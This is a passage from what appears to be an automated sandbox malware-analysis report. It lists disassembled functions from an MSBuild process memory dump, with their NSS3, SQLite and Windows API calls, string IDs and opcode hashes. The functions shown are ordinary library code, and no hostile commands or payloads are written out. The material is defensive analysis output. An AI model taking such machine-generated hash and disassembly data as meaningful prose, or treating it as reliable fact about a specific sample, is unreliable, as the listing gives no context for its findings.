                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                        • API String ID: 632333372-2222229625
                                                                                        • Opcode ID: 37841d7be042d7f6efa236749f91238b5b467433d75e5e99642db69322429843
                                                                                        • Instruction ID: e415ff6fb4cbe6f5845c0f43a6a161f799d9062064432d065a946a0b28b2d694
                                                                                        • Opcode Fuzzy Hash: 37841d7be042d7f6efa236749f91238b5b467433d75e5e99642db69322429843
                                                                                        • Instruction Fuzzy Hash: 0D4125717006018BE7188F19DE98BA773B6AF8631DF14097CE8066FB40DB36E815C799
                                                                                        Function 6C6DA470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6DA4A6
                                                                                          • Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C6DA4EC
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C6DA527
                                                                                        • memcmp.VCRUNTIME140(00000006,?,?), ref: 6C6DA56D
                                                                                        • memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C6DA583
                                                                                        • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C6DA596
                                                                                        • free.MOZGLUE(?), ref: 6C6DA5A4
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6DA5B6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
                                                                                        • String ID: ^jil
                                                                                        • API String ID: 3906949479-3219985638
                                                                                        • Opcode ID: 71d21cd2771874ab30f7478bf6a6a1fe5524277662f5bfc2a24f9ef7a6c2b2d5
                                                                                        • Instruction ID: 37f0cabc3af0d6b44ca1d2112559b23484c2ed1717c84ff91e41fc4a626fd998
                                                                                        • Opcode Fuzzy Hash: 71d21cd2771874ab30f7478bf6a6a1fe5524277662f5bfc2a24f9ef7a6c2b2d5
                                                                                        • Instruction Fuzzy Hash: 2D410635A093469FDB00CF59CC44B9ABBB2BF84308F19C468D8595BB42EB31F919C7A5
                                                                                        Function 6C686DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,6C687D8F,6C687D8F,?,?), ref: 6C686DC8
                                                                                          • Part of subcall function 6C6DFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C6DFE08
                                                                                          • Part of subcall function 6C6DFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C6DFE1D
                                                                                          • Part of subcall function 6C6DFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C6DFE62
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C687D8F,?,?), ref: 6C686DD5
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FA0,00000000,?,?,?,?,6C687D8F,?,?), ref: 6C686DF7
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C686E35
                                                                                          • Part of subcall function 6C6DFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C6DFE29
                                                                                          • Part of subcall function 6C6DFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C6DFE3D
                                                                                          • Part of subcall function 6C6DFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C6DFE6F
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C686E4C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E116E
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FE0,00000000), ref: 6C686E82
                                                                                          • Part of subcall function 6C686AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C68B21D,00000000,00000000,6C68B219,?,6C686BFB,00000000,?,00000000,00000000,?,?,?,6C68B21D), ref: 6C686B01
                                                                                          • Part of subcall function 6C686AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C686B8A
                                                                                        • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C686F1E
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C686F35
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FE0,00000000), ref: 6C686F6B
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,6C687D8F,?,?), ref: 6C686FE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 587344769-0
                                                                                        • Opcode ID: e77d0ef98c73a1a85aefd1435f22b43b5ff4480a33113817da5738ed85fd1fd3
                                                                                        • Instruction ID: 43de3eafffd6af768d4f82884978984307bf16cd3a6e1f212052eb5731831623
                                                                                        • Opcode Fuzzy Hash: e77d0ef98c73a1a85aefd1435f22b43b5ff4480a33113817da5738ed85fd1fd3
                                                                                        • Instruction Fuzzy Hash: 3271B471E212469FDB00CF55CD40BAABBA5FF95308F154229E818DBB11F770EA94CBA4
                                                                                        Function 6C6CADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
                                                                                        • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
                                                                                        • free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
                                                                                        • TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEF1
                                                                                        • free.MOZGLUE(6C6ACDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?), ref: 6C6CAF0B
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAF30
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                        • String ID:
                                                                                        • API String ID: 161582014-0
                                                                                        • Opcode ID: 8cc601312a1df8bc355db320d417b4a0ab49ff76f140f9b9115c73383b4afff9
                                                                                        • Instruction ID: 0ebdc46813fe7013629e82434c2ea7a4619c0931b1f194d9a2f487106b974de3
                                                                                        • Opcode Fuzzy Hash: 8cc601312a1df8bc355db320d417b4a0ab49ff76f140f9b9115c73383b4afff9
                                                                                        • Instruction Fuzzy Hash: 1D51B1B1A00601AFDB00DF29D889B55B7B4FF09318F144665E81897F12E731F865DBD6
                                                                                        Function 6C6A4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CB4
                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CC8
                                                                                        • TlsGetValue.KERNEL32(?,6C6AAB7F,?,00000000,?), ref: 6C6A4CE0
                                                                                        • EnterCriticalSection.KERNEL32(?,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CF4
                                                                                        • PL_HashTableLookup.NSS3(?,?,?,6C6AAB7F,?,00000000,?), ref: 6C6A4D03
                                                                                        • PR_Unlock.NSS3(?,00000000,?), ref: 6C6A4D10
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • PR_Now.NSS3(?,00000000,?), ref: 6C6A4D26
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                        • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C6A4D98
                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C6A4DDA
                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C6A4E02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 4032354334-0
                                                                                        • Opcode ID: e838d87b6f3329398005b1c15fcd0f6e979b58fcb0ae2b2421e79ce1d3d73cd6
                                                                                        • Instruction ID: 9f8c39fc6e21279cf98770f83d5c0338f015570bdc1b0d85451fabe99003b4e8
                                                                                        • Opcode Fuzzy Hash: e838d87b6f3329398005b1c15fcd0f6e979b58fcb0ae2b2421e79ce1d3d73cd6
                                                                                        • Instruction Fuzzy Hash: 5841A4B5900601AFEB00AF68EC4596677A8AF0635DF144171EC08C7B12EF71ED15C7AA
                                                                                        Function 6C6E4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C6E536F,00000022,?,?,00000000,?), ref: 6C6E4E70
                                                                                        • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C6E4F28
                                                                                        • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C6E4F8E
                                                                                        • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C6E4FAE
                                                                                        • free.MOZGLUE(?), ref: 6C6E4FC8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                        • String ID: %s=%c%s%c$%s=%s$oSnl"
                                                                                        • API String ID: 2709355791-1652504446
                                                                                        • Opcode ID: 6c88e3e632746098d102797c13408b1a088aa68b090a963023b8ce0505060deb
                                                                                        • Instruction ID: 47869354b4c7de44d1b56a180c1e97f8acd5f9601ebcd0b3ae6023ac622e7aa1
                                                                                        • Opcode Fuzzy Hash: 6c88e3e632746098d102797c13408b1a088aa68b090a963023b8ce0505060deb
                                                                                        • Instruction Fuzzy Hash: D6513B31E0F1458BEB01CAFA84907FF7BF59F8E348F188167E894A7A40D37599068799
                                                                                        Function 6C6BACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C6BACE6
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BAD14
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAD23
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BAD39
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nyl
                                                                                        • API String ID: 332880674-2485272832
                                                                                        • Opcode ID: 31583dfbd0235a20572bcf052ae0fb37ed4721866527067eb187fe26ae243d55
                                                                                        • Instruction ID: cd2d6bca48d29f1d0a6cc1685a3a6872810664872ed2d6def6ecdb81cd8088f4
                                                                                        • Opcode Fuzzy Hash: 31583dfbd0235a20572bcf052ae0fb37ed4721866527067eb187fe26ae243d55
                                                                                        • Instruction Fuzzy Hash: 55212F32600108DFD740DB54DD4DB5A37F5EB4A71DF044435E409A7612DF349919C79A
                                                                                        Function 6C6BA550 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageEncryptFinal), ref: 6C6BA576
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BA5A4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BA5B3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BA5C9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptFinal$nyl
                                                                                        • API String ID: 332880674-3189223990
                                                                                        • Opcode ID: dd46b249de4c0dddac083efe8aae1560562371b31b8ca4c5401056662dcd55ba
                                                                                        • Instruction ID: 80cc8d892de61b94f60b3a9912c39ae4b3884f68d97f318df346f1d1c98791fb
                                                                                        • Opcode Fuzzy Hash: dd46b249de4c0dddac083efe8aae1560562371b31b8ca4c5401056662dcd55ba
                                                                                        • Instruction Fuzzy Hash: F9212C72601108DFD740DB54DE8CBAE37B5EB4A31DF044435E409ABA12DF349A59CB9A
                                                                                        Function 6C6CCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C6CCD08
                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C6CCE16
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6CD079
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1351604052-0
                                                                                        • Opcode ID: ccbe20ccf4ed2edd58d4562bf4933927beca90d7baf4462b9e481be3f3ab577a
                                                                                        • Instruction ID: 7205f69dbffd84e8fbb6a54eec0a4e03adbf2d1b2cf48160b65ca73b48815e61
                                                                                        • Opcode Fuzzy Hash: ccbe20ccf4ed2edd58d4562bf4933927beca90d7baf4462b9e481be3f3ab577a
                                                                                        • Instruction Fuzzy Hash: 81C1AFB1A002199BDB10DF28CC84BDAB7B4FF49308F1441A8E84997741E775EE95CF9A
                                                                                        Function 6C6765D0 Relevance: 13.8, APIs: 4, Strings: 5, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C67670B
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C672B2C), ref: 6C67675E
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C67678E
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C672B2C), ref: 6C6767E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                        • String ID: @yl$Pyl$winClose$winUnmapfile1$winUnmapfile2
                                                                                        • API String ID: 3168844106-2562422158
                                                                                        • Opcode ID: 2ce61b15128022ab41a024a0e9be60637c48e639eb7a90369934bc3e4649afd9
                                                                                        • Instruction ID: 8097e7abb6780882eae9eea630cd33053333a5b5c7cf4b29627477cb3462e38c
                                                                                        • Opcode Fuzzy Hash: 2ce61b15128022ab41a024a0e9be60637c48e639eb7a90369934bc3e4649afd9
                                                                                        • Instruction Fuzzy Hash: F8A1B036B01210CFDF59AF64E989A6A3771BF0A319F14487CE906CB640DB34ED41CBA6
                                                                                        Function 6C682C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_ZAlloc_Util.NSS3(9DAE394A), ref: 6C682C5D
                                                                                          • Part of subcall function 6C6E0D30: calloc.MOZGLUE ref: 6C6E0D50
                                                                                          • Part of subcall function 6C6E0D30: TlsGetValue.KERNEL32 ref: 6C6E0D6D
                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C682C8D
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C682CE0
                                                                                          • Part of subcall function 6C682E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C682CDA,?,00000000), ref: 6C682E1E
                                                                                          • Part of subcall function 6C682E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C682E33
                                                                                          • Part of subcall function 6C682E00: TlsGetValue.KERNEL32 ref: 6C682E4E
                                                                                          • Part of subcall function 6C682E00: EnterCriticalSection.KERNEL32(?), ref: 6C682E5E
                                                                                          • Part of subcall function 6C682E00: PL_HashTableLookup.NSS3(?), ref: 6C682E71
                                                                                          • Part of subcall function 6C682E00: PL_HashTableRemove.NSS3(?), ref: 6C682E84
                                                                                          • Part of subcall function 6C682E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C682E96
                                                                                          • Part of subcall function 6C682E00: PR_Unlock.NSS3 ref: 6C682EA9
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C682D23
                                                                                        • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C682D30
                                                                                        • CERT_MakeCANickname.NSS3(00000001), ref: 6C682D3F
                                                                                        • free.MOZGLUE(00000000), ref: 6C682D73
                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C682DB8
                                                                                        • free.MOZGLUE ref: 6C682DC8
                                                                                          • Part of subcall function 6C683E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C683EC2
                                                                                          • Part of subcall function 6C683E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C683ED6
                                                                                          • Part of subcall function 6C683E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C683EEE
                                                                                          • Part of subcall function 6C683E60: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C683F02
                                                                                          • Part of subcall function 6C683E60: PL_FreeArenaPool.NSS3 ref: 6C683F14
                                                                                          • Part of subcall function 6C683E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C683F27
                                                                                        Memory Dump Source
